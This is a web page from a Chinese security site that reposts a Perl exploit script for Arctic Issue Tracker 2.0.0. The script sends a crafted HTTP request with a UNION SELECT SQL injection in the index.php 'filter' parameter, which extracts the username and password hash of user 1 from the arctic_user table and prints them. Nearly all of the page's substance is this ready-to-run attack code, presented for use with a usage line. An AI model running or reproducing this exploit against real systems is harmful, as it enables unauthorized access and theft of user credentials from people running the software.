• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit ,其中包含Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit 等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/perl use IO::Socket;
print q{
-----------------------------------------------
Arctic Issue Tracker v2.0.0 exploit by ldma
~ SubCode ~
use: arctic.pl [server] [dir]
sample:
$perl arctic.pl localhost /arctic/
----------------------------------------------- }; $webpage = $ARGV[0];
$directory = $ARGV[1];
print " -initiating\n";
print "|--modules..OK!\n";
sleep 1;
print "|--premodules..OK!\n";
sleep 1;
print "|--preprocessors..OK!\n";
sleep 1;
print " -opening channel.. OK!\n";
sleep 2;
print "--------------------------------------------\n";
print "~ configuration complete.. OK!\n";
print "~ scanning";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
if (!$webpage) { die "\ rtfm geek\n"; } $wbb_dir =
"http://".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--"; print "~ connecting";
$|=1;
foreach (1..1) {
print ".";
sleep 1;
}
print " OK!\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Server\n"; print "~ open exploiting-tree";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";
print "[ ] Target: $webpage\n";
while ($answer = <$sock>) {
if ($answer =~ /Current Filter: <strong>(.*)<\/strong>/) {
print "exploiting in progress";
$|=1;
foreach (1..3) {
print "...";
sleep 1;
}
print "OK!\n[ ] vuln: OK!\n\n\nwell done, ldma!\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "[ ] USER-ID: -1\n";
print "[ ] ID-HASH: $1\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
exit();
}
} close($sock); # ldma
</div>

您可能想查找下面的文章:

相关文章

  • eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit
  • PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
  • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
  • Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
  • Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
  • The Personal FTP Server 6.0f RETR Denial of Service Exploit
  • ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
  • LoveCMS 1.6.2 Final Update Settings Remote Exploit
  • BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
  • Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • WFTPD Pro Server
    • Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
    • PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC
    • Maian Uploader
    • Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability
    • Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln
    • Acoustica Mixcraft
    • pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability
    • minb 0.1.0 Remote Code Execution Exploit
    • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有